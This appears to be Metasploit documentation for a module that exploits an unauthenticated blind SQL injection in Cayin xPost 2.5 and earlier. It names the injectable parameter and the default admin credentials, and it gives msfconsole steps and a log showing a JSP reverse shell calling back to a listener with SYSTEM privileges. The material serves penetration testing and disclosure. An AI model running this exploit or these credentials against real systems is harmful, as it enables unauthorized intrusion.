h00die
2.0 KiB
2.0 KiB
Vulnerable Application
This module exploits an unauthenticated SQLi in Cayin xPost <=2.5.
The wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can
be injected with a blind SQLi. Since this app bundles MySQL and Apache
Tomcat the environment is pretty static and therefore the default
settings should work. Results in SYSTEM level access. Only the
java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads seem
to be valid.
Default authentication for the system is administrator:admin from Guide page 16
Verification Steps
- Install the application and start it
- Start msfconsole
- Do:
exploit/windows/http/cayin_xpost_sql_rce - Do:
set rhosts [ip] - Do:
run - You should get a shell.
Options
LOCALWEBROOT
Path to the webapps folder for Cayin. Defaults to C:/CayinApps/webapps/
Scenarios
Cayin xPost 2.5 on Windows 10.0.16299.125
[*] Processing xpost.rb for ERB directives.
resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
resource (xpost.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xpost.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xpost.rb)> set verbose true
verbose => true
resource (xpost.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Utilizing payload filename cY0bWf1Rh6C9.jsp
[*] Payload Size: 1499
[*] Payload Size Encoded: 2998
[*] Attempting Exploitation
[*] Triggering uploaded payload
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
[!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat>whoami
whoami
nt authority\system
C:\CayinApps\Tomcat>ver
ver
Microsoft Windows [Version 10.0.16299.125]
C:\CayinApps\Tomcat>